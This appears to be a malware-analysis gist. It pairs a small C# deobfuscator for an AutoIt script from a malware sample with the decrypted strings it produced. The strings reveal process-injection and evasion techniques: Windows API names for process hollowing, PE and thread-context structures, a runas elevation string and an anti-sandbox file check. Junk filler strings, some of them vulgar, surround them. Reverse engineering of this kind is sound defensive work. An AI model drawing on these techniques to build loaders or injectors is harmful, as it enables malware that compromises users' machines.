Quick and Dirty deobfuscator for an AutoIT script part of a malware sample, SHA256: db8eb8347ed084c3ee3707ad032743e350157abcaf2817e5f15777b20c554b7f

Program.cs

// Deobfuscator for a3x file of sample SHA256: db8eb8347ed084c3ee3707ad032743e350157abcaf2817e5f15777b20c554b7f
using System.Text;
using System.Text.RegularExpressions;

internal class Program
{
    private static void Main(string[] args)
    {
        var strings = new StringBuilder();
        string pattern = @"DoctrineDrama\(""(\w+)"",\s*(\d+)\)";
        var input = File.ReadAllText("script.a3x");

        while (Regex.Match(input, pattern).Success)
        {
            var match = Regex.Match(input, pattern);

            string result = Decrypt(match.Groups[1].Value, int.Parse(match.Groups[2].Value));

            int endOffset = match.Index + match.Length;

            string oldValue = input.Substring(match.Index, match.Length);

            input = input.Replace(oldValue, result);

            Console.WriteLine($"Decrypted string: {result}");
            strings.AppendLine(result);
        }

        File.WriteAllText("deobfuscated.a3x", input);
        File.WriteAllText("strings.txt", strings.ToString());

        Console.WriteLine("\nDone");
    }

    static string Decrypt(string input, int key)
    {
        //Console.WriteLine($"Input => {input}");
        var content = input.Split('h');
        var builder = new StringBuilder();
        for (int i = 0; i < content.Length; i++)
        {
            builder.Append((char)(Convert.ToInt32(content[i]) - key));
        }
        return builder.ToString();
    }
}

strings.txt

Fu#Underground#Studio#Resident#
shlwapi.dll
bool
PathIsDirectoryW
wstr
EcGUKitAuT
TrayIconHide
BftkcbgrCIAFqCWNoE
Consists@Registry@Man@Doctrine@Drainage@
respective@Box@Gary@Herbs@Spot@
lTwG
tFtaPoxkbL
kernel32.dll
dword
GetActiveProcessorCount
Interpretation#Family#Democracy#
Sqrt(42895)
OVERNIGHT    POSTAL    
DriveGetSerial('ubOOvHmgogx')
DANRnFhBBIbcql
abLwPZsuzlbfp
STREAMS-DISCIPLINE-
znKLjtwCYX
cameras*actual*examines*pdt*
signs#Glenn#
sbRAgQBbTlNcEZhnJcDtdxAGoQvj
^.*\\
StringIsFloat('ZHWWlsbzf')
XjfkZUSYBRMLNgZWgHO
WinGetPos('phillips/sleeps/intense/')
posrWHpPCP
long
GetErrorMode
StringIsFloat('iiTvGjAQWUfhti')
Punishment!Churches!
cwBTtoDw
oXdmatZerCmxTsrYwr
lmodwnP
cmd
 /c 
runas
CloseHandle
ptr
161
DriveGetSerial('kABZzK')
circles^represent^alternatively^guitars^
fTsulpZLaME
WLOVAwvXX
HWnd('Guam^Reynolds^')
adjust/Considerations/Spencer/Maui/
DllStructGetData($citysearchNsFinalsChesterLetters, $michiganforcegateshuttle, $lewisDetectionAssignmentsJoinsFrequent)
DllStructGetData($citysearchNsFinalsChesterLetters, $michiganforcegateshuttle)
StringIsFloat('PcFztRoBJm')
zDsZWljpo
VKWuKoVvTMe
pxMlotTa
jVtHfldlG
znPmqzUesVoPK
OSuWMALGD
Test=Helped=
xZwuwuB
WinGetPos('ACID-FUTURE-')
StringIsFloat('VHtbhTEdaUI')
Sqrt(1809)
Sqrt(57346)
li#chargers#
BFbToeRdoglEIivbz
banned#Roulette#Passing#
HWnd('survival-cordless-grid-float-put-')
dword VirtualAddress; dword SizeOfBlock
XYTNWXAFgKMczIy
hjrZqqoDKX
JOTdKQdDFBybxL
VirtualAddress
Fortune=Winning=
FUNERAL GUARANTEED 
lIamQxxwZYqaikipMo
UzWESrWBTul
SizeOfBlock
97
kept*Suspect*
bKZ
HWnd('Banks-Amongst-Cedar-Johnson-Thanks-')
word[
101
Federal^Michelle^
projectors*Show*Mechanism*
ran^prefix^
HmLB
joyuQBzQ
lcsNWoBX
rPfBHSTJoSnOIkj
ZsoDSXCWHt
GoJWvhcPCerxNoZArne
adUBzNlS
13
zojxeXQHBgcWoKOcBDyqytZ
ZINfmUPZPi
HWnd('Authority/Expand/Criterion/')
Directors    Priest    
HWnd('Slowly#Indirect#Tourism#Founder#')
nZUzwyvHNVowiVQX
XegFuQqkMWtTh
EInZNgg
xnxx Mariah Hood Backed Third 
posFOHbWrUMtTRgWox
hRlRfj
DriveGetSerial('HrPaOZqLW')
btFh
WinGetPos('Diversity Lightning Refers ')
145
dutch=Sie=
CSHfCvzl
EhNqazsqdI
SyyCZuLuXKl
WinGetPos('TIPS*CONTINENT*')
HWnd('ntsc#trades#sacrifice#')
QXUdCnVDBrTmauzHzVaqDrWOT
StringIsFloat('wLvgPuOUJt')
bxiLff
ZlWAhlKLNxOAjOn
YtHlpv
tVJTDGGvIukjKgDnl
nLVhBjeJdx
exposure^Fog^Mixed^Focus^
OJEHLmPWAFVDLLYO
HhVYXI
Sqrt(8541)
Inner+Viewing+
controller/Columbus/Atlas/Noble/
HWnd('florence    aug    ')
DriveGetSerial('UKusr')
StringIsFloat('GFtBxcsuphxaa')
Camcorders Bag Mustang 
NEWCASTLE/DEALERS/BERMUDA/BUGS/NEWSPAPERS/
LITERACY+HERE+DYNAMICS+
nsXxAiXx
IGNORE DOWNLOADS ITALIC 
Rebel@Blast@
fxTkshuN
vegetables/unto/war/jackets/selective/
25
141
StringIsFloat('lHwsMMBi')
presented    Indonesia    Sexo    Sheer    
Sqrt(44582)
stuff*Print*Toolbar*
WinGetPos('Bradford*Immediately*Commented*')
Enable*Kitchen*Bike*
island+Agriculture+Funds+Notified+Default+
DriveGetSerial('GamKbiD')
eKbTVHLq
RYQknUUNiHfJY
nQFIQRllMGIbN
PyZ
VirtualAllocExNuma
handle
dword_ptr
138
MQCRkHY
41
shade=Bulletin=Terror=Concerning=Raised=
AdUhGlsI
LDeBOdhHD
QchJib
vid Moms Integrating 
gardening-expressions-taught-
Sqrt(6125)
TA@HAT@RANKS@BRUNSWICK@RELATIVE@
Undertaken-Mariah-Roses-Diamond-Greek-
Sqrt(62592)
aBzDmAX
XPKgbwa
Contracting^Apache^Unavailable^Joseph^
GLOubJqDdIHLBeMTcC
XKufNnFLvP
132
HWnd('Cordless!Sole!Chapter!Lending!')
Succeed Reader Talking 
CRYSTAL TRACKED CSS MIGRATION 
DriveGetSerial('qQgkCoVkaWq')
cnetcom Sunrise Pierce Proc 
Sqrt(39133)
Throwing    Proudly    Geology    Vocals    
DriveGetSerial('udRcksbC')
yJICNdkVPsKWwFtiMmjjZVnm
bwjHkyAizyiXBlAGOlkojlJcEb
Reporter Badge Je Participants Transferred 
JZHpfHcmRprqo
fWTWia
WinGetPos('joseph*Mae*Msg*')
funky=lifestyle=psychology=
DriveGetSerial('hYcYvNftYTEJqdGao')
Ld@Reduces@Golden@Reg@Openings@
EnvGet('COMPUTERNAME')
tz
WinClose(AutoItWinGetTitle())
Actual/Dept/Communicate/Retention/
yLWMcNTH
pZlcUWKnDJxJVu
jElnfSO
YAg
commissions@Measures@
DriveGetSerial('bvCiahPj')
DriveGetSerial('kEhEQnB')
Sqrt(27756)
czqIKKTAcC
DriveGetSerial('hcMGSxzL')
KwmpppMG
TvAAGpZUTgCAj
aHffpY
RIGbNTHxNPJQs
190
choir/garmin/dicke/
Mother-Surround-Ave-
eOJLBpNsEqbIRphNsiHLvG
CIVILIAN^SECOND^CAUGHT^FACES^
LakFhOgGm
GqsSUxcI
Veterinary^Thats^Laptop^Pt^
70
WinGetPos('PRICED#SOIL#HOTTEST#JOSHUA#')
Parties@Calvin@
Sqrt(27969)
rrSGWm
twCtFZob
thEGvzkghzyrqw
AZDPkgNMOr
bkacbgFs
tape@Beat@
WinGetPos('possess    impact    ')
UeUIPvUg
XeboPhyMlbGnjg
BILLY=ACTIVISTS=
jordan    Waiver    Revised    Ll    Warner    
HWnd('jQanhYoyqfuwnBT')
Webmaster=Division=Comic=
Sqrt(56938)
HWnd('gregory*angola*reply*nested*pt*')
WinGetPos('scientist-relaxation-spain-')
favors*password*
GOVERNING#THREADED#COURAGE#
METALS    DIES    LOADING    
HWnd('ARIZONA    APPRECIATED    ASSIGNED    AAA    HOUSEWARES    ')
xsE
StringIsFloat('XZHkhtIZfYi')
79
111
WinGetPos('Practical*Far*Diving*')
lScKbjVnlu
joUfwTLJRRQxR
iwVRAuIqVwVbz
NEWSLETTERS-JAR-
REGISTRAR^ASSESSMENT^AE^
DriveGetSerial('sZhYfPBABolOlvp')
SKumSRTrYaxCLUPB
dBoUFMu
RRvCSQfaXLetDEg
zxkpKDO
Sqrt(53450)
IpOWYGNrAWxzYX
mandate    ten    dive    dish    
strike=Cameron=Detailed=
Alert-Visible-Perry-Mysql-Day-
require+europe+
hQAlRNMT
LKuniCEsefmT
YhWzaqyzGsOL
Sqrt(24415)
Sqrt(43429)
WinGetPos('PNoizmuaEzDUN')
past*allows*joining*
DriveGetSerial('NLurhyZmMALsrcZyO')
Sqrt(63118)
OBJECT!SOMEONE!ASTRONOMY!
StringIsFloat('mvPFFNvm')
150
Justin+Matters+
WinGetPos('dmlqlNnFGFseA')
Goes@Telling@Handle@Merge@
WinGetPos('radiation!Singapore!Stages!Earthquake!Let!')
zoloft/purchase/governance/effect/delay/
Engage^Arkansas^Entertainment^
nxxUjyEp
agazGrt
RKBDjdZ
PtCNOI
fFRWbLIGoZYkeG
XWSlhLmlhIlp
ima
COMPONENTS    ENGINEER    
wm    conditions    sluts    thanksgiving    sat    
jxfaqqci
WinGetPos('demands+backed+theaters+downloadable+')
WinGetPos('win    Heated    ')
zfITkXxov
WinGetPos('populations!Quest!Mathematical!')
NZGTpIjqeJvlanWIhDEpyqnTRbFrO
C:\aaa_TouchMeNot_.txt
DriveGetSerial('fCamndgIDsBIzedPF')
lJjESX
ETZnqewhzIVxLD
FfcJOL
HWnd('HIKING+SUSPENDED+UNDERSTANDING+VAGINA+')
NfZtFbPfH
ELICZ
Waves#Strength#Barn#
MAKERS=GMC=RANKINGS=
Una Scenarios Header Pediatric 
EnvGet('USERNAME')
scanner
ORDER=TIM=STAY=
StringIsFloat('rXbRgonUXCvgt')
cold    present    secure    
meat+pending+lithuania+teacher+landscape+
ob^sarah^though^colleges^residential^
copper-adjustable-whereas-cams-panasonic-
discussedHealthCoveredOutreach
krDzudj
ZvHJpACuoAErXdHN
fteExzSDptiY
Floral/Hawaiian/Kenneth/Ingredients/
generators/Port/Joe/Dial/Extent/
wan@Fix@Person@
uBlMoHqlZqOjiCVCsnbKRYxDplWG
ACTION!HOME!
DriveGetSerial('YLOtmbVpMxJmBiGW')
Sqrt(22784)
JnHyvdOpIzMoVzixe
Perfume!Cheapest!Appliance!
gun^Completion^
WinGetPos('gui Rides Exists ')
HWnd('MIME!ENTER!')
created-behalf-plc-presenting-
191
Sqrt(40539)
WinGetPos('sculpture+Undertaken+')
pleased/Reservations/
DriveGetSerial('dCbhNsEBdOmneNd')
GKieqQveJUYta
tuning@univ@lauderdale@
yard@hosting@
StringIsFloat('jqGzYOzoldq')
DriveGetSerial('tOCgHyoSLiUb')
StringIsFloat('PaGITgnXGUw')
aSCPjeRjbuJqoiBX
RHcmLEO
StringIsFloat('mewrKVFiUbjpb')
HWnd('UNITY=BUSINESSES=FLAGS=OLD=TH=')
117
HWnd('STORIES^DOMAINS^')
186
83
HWnd('copper=Mature=Threatening=Know=German=')
wnQFbjqoPoUjQyLenC
Arrange    Resolution    
PQAEpByBEjXJsb
75
BOLT-HEARTS-DIMENSIONAL-RELIABILITY-
texts/Finances/Produce/
StringIsFloat('JRXshPPiop')
HWnd('aADiXgAzxvzwmZrb')
gMKRsQwaKR
bind=Networks=
individually#arise#denver#generating#harper#
HWnd('retrieval*scripts*only*sodium*')
WinGetPos('dl-creature-noon-christian-')
JaObwU
Sqrt(64690)
HWnd('bpGSkugxlUrJRyj')
HWnd('Performing#Buffer#Translate#')
tours section story 
Detection-Deemed-Automated-Dance-
StringIsFloat('dnyrTPgT')
diego/quilt/
EpyTTvOfg
JtOhPbou
esyBTEza
advisors@bobby@objective@paintball@
HWnd('BB*GA*')
WinGetPos('interactive+parliamentary+bath+living+glen+')
DrcAFAUzzwLqniquDzS
lZHdyJBb
situation^philosophy^lands^clothes^goods^
Sqrt(49108)
HWnd('uc Untitled Screen Comply ')
ROBUST+SWISS+GAIN+WARNED+NP+
RACIAL#CAMP#
uPyophuxm
mDjhiB
somewhat!Affect!Editions!
StringIsFloat('FkKfRwGzCt')
182
StringIsFloat('QueNpKYCYSB')
DsBewdhWncXrcOSk
DriveGetSerial('bgorgkYU')
WinGetPos('REGARDLESS#LEGAL#CHRISTIANITY#APPLIES#')
ti!clinic!
95
DENIAL/ACHIEVEMENTS/OMAHA/DEMOCRATIC/INTERACT/
HWnd('PACKETS ACER VERIZON ')
JiOltLprRMbBfAfe
WeBmtgvY
explicitly=second=farm=responded=
CvuPmP
ehYOuoEjndSRsckiT
owaGdJf
ShHTIXSAzDNJZFBy
Provinces+Ourselves+Seeking+Advisor+
HWnd('PRESCRIPTION!OOO!BABIES!HARASSMENT!CAM!')
StringIsFloat('AqawLHty')
WinGetPos('OWEN+MYANMAR+COMPARABLE+GLORY+')
yNAjYGOJbXGQncsUexIbKvHAHlNHW
kw@mortgage@specialty@trinity@
MPIudUD
rVmzmyHspNd
DriveGetSerial('OSdeKteIdxeH')
hOklpGWSO
sJcoISXC
TqBNDvO
uTnuZv
oRGjCtdaO
UnpBCneuSxRTWgB
settle@contracting@lazy@notebooks@commander@
Sqrt(48867)
YNqiYJdczKriaZJJMZiJP
chick/Sims/
debut-Mud-
Sacramento!Govt!Opened!Attempting!
HWnd('Inserted!Astronomy!Ot!Momentum!Tail!')
WinGetPos('yslHTajiuUHOElKg')
HWnd('screens/Artwork/Gasoline/')
114
WmDsCem
lLtdCYg
TivwRGgZlvFpOnMCNas
TChSWTAuIE
SYqYUFby
WinGetPos('We/Cause/Schools/Assumption/')
PERCEIVED-LADIES-BOUND-CHANGELOG-
uint
SetErrorMode
DriveGetSerial('RGgrr')
nmuqIHcTx
rugs    rational    facilitate    airfare    
YfjkShboiCrkjN
moderate!City!Alike!
DriveGetSerial('ZfUBULJqVMmJuqS')
48
WinTitleMatchMode
DriveGetSerial('eHKjrjprnIP')
dyycBqkor
tvLAsmtsSwXwGb
ANMIqBwKcRc
uint Size;hwnd hOwner;ptr hInstance;ptr Text;ptr Caption;dword Style;ptr Icon;dword_ptr ContextHelpId;ptr MsgBoxCallback;dword LanguageId
daTypjSvB
karl+whore+joan+richard+
WinGetPos('poverty#inherited#appeal#together#contamination#')
wchar[
HadJhoMziA
Sqrt(55928)
Analog/Classification/Treasurer/Elite/
Directed=Thought=Ways=Clinton=
NURSERY@LETS@JM@QUOTE@LIKED@
WinGetPos('that-Jordan-Want-Oriented-')
#
fjFI
WinGetPos('DECLARE/DOWNLOADED/')
WinGetPos('edinburgh@Surrey@Match@')
Sqrt(26048)
iZGLlr
cXrVTuV
VURnGVluFjjah
RPG+ASPECT+
Glasgow-Convergence-Staying-
DriveGetSerial('NqsqqMEwEynIgCyK')
HWnd('hosted-tend-clean-')
GetModuleHandleW
Sqrt(45037)
Flu-Bend-Colonial-Washer-
uLOgcU
qualifications Motels Mba 
Sqrt(25054)
HWnd('cook#mug#telescope#building#')
managers=Learning=Submit=Naked=Happened=
HWnd('BIKINI!ORGANIZATION!')
exempt=thumbzilla=assembled=missing=
StringIsFloat('eKuRTDkBdKXX')
StringIsFloat('dtSeuxdnCzXYiW')
NpUeNdZZF
CEKZxpfVPbMRGjnTajt
otkLfZlOOYHvR
BZZXmJ
vvnYBsLPMLshKdVsqZ
WEHksspLgGEsqh
COMMITTED    WINNING    SMELL    
ZkNBn
YOURS+TERRORISTS+RACK+
colony Temporarily Pulling 
DriveGetSerial('ucglcHgrL')
bufing+southern+sperm+elimination+
HPdMUcMspUZeIuBLVwC
zdyFS
Size
dNGvnMGPPm
QxuCDp
PROSPECT@NORMAL@SKILLS@
BDdzIKwOdYO
lTSlQP
HWnd('Chicken/Scsi/Chevrolet/Involved/')
hOwner
FwfBSAZKB
PxQtJA
vKRYbtNGzC
Monster-Qld-
Sqrt(13588)
korea@Surrounded@
hInstance
Muj
ray*minor*shoppercom*
thread!Wish!Cock!Pi!Spoken!
EDT*BESIDES*CONFERENCES*
KJrMaL
UbBwqTbstDcF
bLohQNpelJ
VlyssUp
ESvRDodx
DriveGetSerial('MJlMVIELLtLs')
157
Tribute=Participating=Drove=
Text
fees*key*affiliates*
eg+Advise+Trial+
PwvOpcok
fgZdXVWGmoBI
ZjhyGeOeDGTc
sIIscJqZ
beverages*symptoms*graduates*scholar*
Caption
Hazard/Allows/Atom/
56
Style
updates#mv#div#taylor#engagement#
HWnd('ACUTE-BRIEFLY-WIN-BELONGS-PTS-')
service!staff!
Sqrt(2943)
phrases+fundamentals+
omqfpMOcvh
yJohvm
Houses/Strike/Contributed/Larger/Fantastic/
Icon
YsuteP
SO^CHEMICAL^PUB^MUSTANG^
WinGetPos('fair+quizzes+')
ContextHelpId
Trading@Mic@
Debut=Vic=
159
MsgBoxCallback
LanguageId
xOpYMGtIElR
located Worth Discusses Tiffany Filtering 
PNxMkPqdpt
Sqrt(21623)
user32.dll
generations*investors*platform*feeds*
fYeEugKo
AbWTRPDNuwSuu
CZpmuIlSwis
WinGetPos('NN!ACCEPTANCE!CENTURIES!MORTALITY!WIT!')
Young=Eat=
rat=silicon=ot=
GetProcAddress
str
MessageBoxIndirectW
Dale-Decimal-Clark-Units-
CANCER#COMPAQ#
Craig-Shipped-Naked-
MANUFACTURER#IMPOSE#CP#DIAL#WIKIPEDIA#
COMPLEXITY^GUARDIAN^PATROL^INAPPROPRIATE^
CreateThread
dword*
puts^Screw^Restructuring^Domain^
Sqrt(64538)
EqoKRfRetekUmlJlLpCGbfqTn
laura Robinson Sink 
HMuTwyvpD
StringIsFloat('TxvyEHjpsCvwz')
thoughts fitness making silicon cholesterol 
annotated@uc@bin@evolution@
driven    stylus    neural    accessory    
FOCUSES+USD+STEPS+GALLERIES+
Symphony@Sellers@Machine@
2
WinGetPos('Nickname/Implementation/')
StringIsFloat('uCjGYYZeJS')
fighters expand debate hyundai 
CdNhAY
McnMVHgGK
yDphdXD
StringIsFloat('IHrAsZOtbD')
FyW
language-vista-planners-report-performed-
Sqrt(53057)
lenderBloggingPleased
none
HWnd('INCEST=BROADCAST=MOTHERBOARD=ABANDONED=')
gOlLxX
MEIQnbYPzvF
DriveGetSerial('AEtwQBmZs')
uint_ptr
SetTimer
hwnd
qFeylx
HWnd('Shore-Stat-Saver-Trackback-Lie-')
transexuales    Treatments    Iii    
Dis!Launched!Vietnamese!Information!Chuck!
uuLUqKSIcepFxEQIrAiUs
StringIsFloat('bLZRuZNNDL')
LrToIhwldFP
OCOqEVcxXR
EVbXheRXnW
StringIsFloat('iafgQBeUr')
DriveGetSerial('IuABZhDALWyIr')
HWnd('TRIPLE    ERIC    ')
WinGetPos('advisor/Amend/')
Citations!Caps!Explanation!Illinois!
voices!bars!bags!seal!book!
GINKJocTmpEgfDLbu
qCKFQEH
RaaOivAJlWoRUjw
TbUuYoxiKWi
kyle!Networks!Formula!Profiles!War!
ONKldTAXboW
Sqrt(37147)
WinGetPos('sn    Exceed    ')
consistency@Live@Kennedy@Shortcuts@Source@
vIZOXdz
DriveGetSerial('KQwCZenkXClBRECwZ')
StringIsFloat('icFzHuBqIxFUvD')
IX=CONTAINING=FOUNDATION=BUBBLE=
DriveGetSerial('NLetSHsihDnkvT')
Sqrt(44700)
kRoOYlNAmeljjdz
DriveGetSerial('HlRKtX')
XBdMSk
stored@Tue@Neighbors@Humanity@Biggest@
HWnd('missions#Reported#Train#Pct#')
123
LNTfxpY
Mba
bra+Vulnerability+Spoken+Sing+
voKOOOHVWkcTKvRlqKg
aIPthaQx
Memorial^Belt^
JlcVWixiL
HWnd('Church Innocent Booth ')
WinGetPos('HB@DRAMATIC@COMPUTATIONAL@PRESIDENTIAL@ACCURATELY@')
StringIsFloat('KSQGIvAv')
StringIsFloat('wjRmgGTm')
XyWTbHZZA
efBVPdJPO
StringIsFloat('nvSGvXUF')
Sqrt(30519)
HWnd('sprint-Periods-Assistant-Fat-')
Sqrt(33815)
PLAYSTATION^PUBLIC^CAPS^JOHNNY^HACKER^
HWnd('FiRWAVrmRFKPdW')
eyed*judy*toshiba*
RaxFWoWYWOMfiAR
fISNx
fcFIgNYG
eUUCoHwtdVzYp
eUASPCiQnASN
StringIsFloat('MKqAmAzPl')
sk    project    black    screw    
QHXIgFRYYo
appliance Answers Longest Check Labor 
gZlrTlnaMnpjekxTj
Previews#Typically#Tasks#
mvrQWqzhF
CsRJdAogzUGldRLnWwe
rQCRZelgTkpVVB
StringIsFloat('kZxtbmgMUXwhW')
StringIsFloat('fPTKaRwyXnZlSu')
ECuyDItbxldAxo
128
HWnd('WARM!TRACKER!CONSUMER!RESULTED!')
WinGetPos('MANHATTAN/TENNESSEE/EUGENE/THRU/WEB/')
HWnd('FqUVdmDLlkEqeV')
hQMyoKINy
BfQicDSjELOBkJ
VOESTAsCwlIwsaYKMViOXYjyG
176
mjzlbHq
JfRrJUFJS
ifBRSRugUa
rGquQGJN
JnctxYmQGVzwucW
rWfRz
Supposed=Expectations=Xml=Company=
Sqrt(51509)
ovQQ
tvwOYFkWuwZCpZEjoPH
MprfM
DI PARISH ROMANIA 
nQGXbdUstgLeR
woRBiKlw
IMFLQv
careers^certificates^bills^watershed^medline^
strand/Snapshot/Languages/
TQcJh
JANUARY/WEBLOGS/CT/
6
SzcehAXz
DNqEXrGyeFPxYYfv
NSnLzEvHZImmA
Interstate!Scanners!Children!Poland!Fork!
znBaqaC
AYDSXXC
DPOnhwvcx
tumor^Research^
DriveGetSerial('tPGfpNfscD')
StringIsFloat('TzDEHzFUuiU')
cover/Shopping/Boards/Authorization/
Ctb
connections!Clicks!Iowa!
StringIsFloat('xgkrOIwxqyw')
DriveGetSerial('nfObbFtixUmJjea')
KVlwx
hardcore buy grounds conflicts 
HWnd('THOROUGHLY!DEPARTMENT!')
dAeCmPClKPKCagM
QTAHr
WinGetPos('hyundai    Fred    Featuring    Probably    Diana    ')
Fed^Visits^
YYIsTcUbMUb
CORpTmVXd
POLYESTER@BROADER@NETHERLANDS@PROFESSIONAL@
StringIsFloat('EpcCsToApI')
zGbaFg
IdYVzgrocO
XgPcJt
TRAILER!SACRAMENTO!STRONG!GUILTY!
StringIsFloat('pJjseTVgRPgz')
nQlJ
wGgBubMySGRtYhBAU
cgVJvbUvvbaheFzJrsoRhbCzk
MVDemdMtI
Advertisements*Separation*Default*
lofUoY
WfelKnRjTAQ
RbdAFRv
Known!Penn!Linda!Conscious!
StringIsFloat('tbwhxfyHYVmnw')
StringIsFloat('gLFexXYhinhr')
WinGetPos('VOLT@INSPIRATION@')
Hang*Upset*Appraisal*
MHVVUtTrqz
OCAIJaLO
int
KillTimer
sit*licking*truly*necessary*
modification*Notifications*
VE#SPORT#NOISE#CRADLE#JUSTIFY#
prev^griffin^sound^
Therefore^Publications^Hate^Sacred^
WinGetPos('SOLD@ROSTER@POLAR@OM@EVIDENCE@')
WinGetPos('cisco+chelsea+')
DAGxlsmzf
awarded*Absolutely*
excluded!exports!seven!observation!
WinGetPos('perspectives@Vote@')
StringIsFloat('OshSGUDrifLf')
MxaDZwsHy
uUJUEWdHTDDwfoRTFmT
GiDTiINAwNPF
37
participants-Complimentary-P-Tan-Lopez-
REMOVABLE DOMINICAN EXCESSIVE CONSIDER CARRYING 
byte[
StringIsFloat('gbTitwUNq')
DriveGetSerial('yKGrmileHCN')
Were=Bookstore=Foods=Observations=
HWnd('Configured!Promotional!Earthquake!Wellington!Flu!')
HWnd('Complaint=Liberia=Developed=')
Appliances!School!Zoo!
opera+violent+looks+
dword  cbSize; ptr Reserved; ptr Desktop; ptr Title; dword X; dword Y; dword XSize; dword YSize; dword XCountChars; dword YCountChars; 
dword FillAttribute; dword Flags; word ShowWindow; word Reserved2; ptr Reserved2; ptr hStdInput; ptr hStdOutput; ptr hStdError
QasONhQae
wu!Arising!Kept!
ptr Process; ptr Thread; dword ProcessId; dword ThreadId
indicated-Rogers-Relate-Thermal-
StringIsFloat('woaKyEpeQ')
CreateProcessW
 
DriveGetSerial('WJfGyKxSyhNPeQNN')
HWnd('Southern*Automobiles*Vegetarian*Agent*Spoken*')
StringIsFloat('GpiCBFnpBU')
JURY    TRAMADOL    OBVIOUSLY    FIGURE    
StringIsFloat('zzegTwETAtD')
174
diabetes#Customize#Sets#Dispute#
Process
xfjcG
Unto    Trigger    
HWnd('champagne=Sigma=')
ZAfQRJ
pOkmCjJKtBqEa
TFbAmdAEsu
DriveGetSerial('VLshCkRk')
Thread
ULTRA    THEY    ACHIEVEMENTS    FOUNDER    EARNED    
DriveGetSerial('WWLusB')
StringIsFloat('KSryaeUEWNQ')
ProcessId
NregRQBRKO
WinGetPos('Bon^Das^')
HWnd('PROPOSE@ADDRESSED@FELL@MUSEUMS@')
HWnd('Wednesday    Packets    Leather    Tribute    Jackie    ')
kYQaLh
LbsFwcuayVqFkz
BuMpuPS
Rysdba
uSjDEhSIaaAHvtj
FubzJTHrStr
BVYQOPw
TZPcIEWHvWRYFC
uiCltu
Shepherd+Occupations+Piece+Sec+Beast+
Sqrt(51811)
TOVIcF
NBpdXVaawK
LpJOrmtTQoFl
RqwWGEgZ
VWnWYyXjSRiD
OauKVB
HWnd('Plane Removable Dress Leaves Neighbors ')
Sqrt(5322)
HWnd('DOUBLE    CHARACTERIZATION    ')
DriveGetSerial('nIJhaVJSSoM')
combat!tickets!pt!pediatric!
Welding!Chest!Usd!
X64
align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home; dword ContextFlags; dword MxCsr; word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags; uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7; uint64 Rax; uint64 Rcx; uint64 Rdx; 
uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15; uint64 Rip; uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; 
uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2]; uint64 VectorRegister[52]; uint64 VectorControl; uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip
GlBPQeRAbBcnAqWhymgTsC
Charity@Regulation@Focused@Morocco@Benz@
wb-urw-librarian-
COMMISSIONS*FIELDS*
StringIsFloat('PKDFbgvRzzqxb')
DriveGetSerial('fVwnZNl')
dword ContextFlags; dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7; dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; 
byte RegisterArea[80]; dword Cr0NpxState; dword SegGs; dword SegFs; dword SegEs; dword SegDs; dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax; dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs; byte ExtendedRegisters[512]
Sqrt(33618)
Director See Coated 
DriveGetSerial('FWrBBoslZSKO')
WinGetPos('attack/Mayor/')
HWnd('minneapolis*drag*volunteers*took*carbon*')
mPvZWeX
98
ContextFlags
HWnd('settlement=bhutan=')
mbZpyQICFAnMCyx
rncwW
LrHWuRSw
XZVGAAOTSNxYgyOCFt
qzkqHRGCg
axis    Rapids    
105
StringIsFloat('oYhOVbmqHnD')
GetThreadContext
npqjuU
hPuWoFYMdr
QwcjQEeHU
SGooasb
NEGATIVE/GENEALOGY/NEARBY/HAPPY/IMPROVEMENT/
WinGetPos('narrow^compiled^')
kxIVB
Ebx
EAT*ROOMS*CONSTRUCTED*EQUALITY*
models*drink*piss*templates*warner*
Francis=Qualifying=
Rdx
pzQgUMJVJMpOQRyPnHwoGl
Sqrt(42610)
gMqZNQzGF
ybkrKKimQfFquSF
AeHkefSgqrwE
char Magic[2]; word BytesOnLastPage; word Pages; word Relocations; word SizeofHeader; word MinimumExtra; word MaximumExtra; word SS; word SP; word Checksum; word IP; word CS; word Relocation; word Overlay; char Reserved[8]; word OEMIdentifier; word OEMInformation; char Reserved2[20]; dword AddressOfNewExeHeader
participant+Jets+Wit+
Conclude^Birmingham^Therefore^Infrared^
80
WinGetPos('Momentum^Severe^Tales^')
UasBJGms
comparison!Studied!Accessing!
mary compounds 
Sqrt(33274)
fog-Subject-
AddressOfNewExeHeader
15
WinGetPos('Excluding+Rates+Shuttle+')
glucose+Petroleum+Dealers+
Magic
Refer!Ja!Random!Delivery!Hire!
MZ
TerminateProcess
defining-sip-
lIHYctpFPrQmZnUJPDB
ftYCryCYQs
dword Signature
StringIsFloat('wBijjzXk')
Chip^Principal^Motorcycle^Inflation^Referenced^
Signature
YoASxFFkjPiwpewjdY
TghZZRVLG
TcAssjjYj
uDWmjrPEejsJOjtJBC
orBCFVTggaYfx
word Machine; word NumberOfSections; dword TimeDateStamp; dword PointerToSymbolTable; dword NumberOfSymbols; word SizeOfOptionalHeader; word Characteristics
Dirt=Workstation=
WinGetPos('TRIBES    PREMISES    CONNECTICUT    HOST    BREAD    ')
exclusively helpful 
NiDhHlzgOXZhvS
IpbSzvORa
NumberOfSections
Taken Uniprotkb 
vjPhIA
naked@stolen@embedded@steve@
Sqrt(4397)
word Magic;
calgary=Wn=Futures=
Seriously Dg Blues Membership 
DriveGetSerial('ffeNfBkMtK')
universe=Export=Ml=Owners=Vegetable=
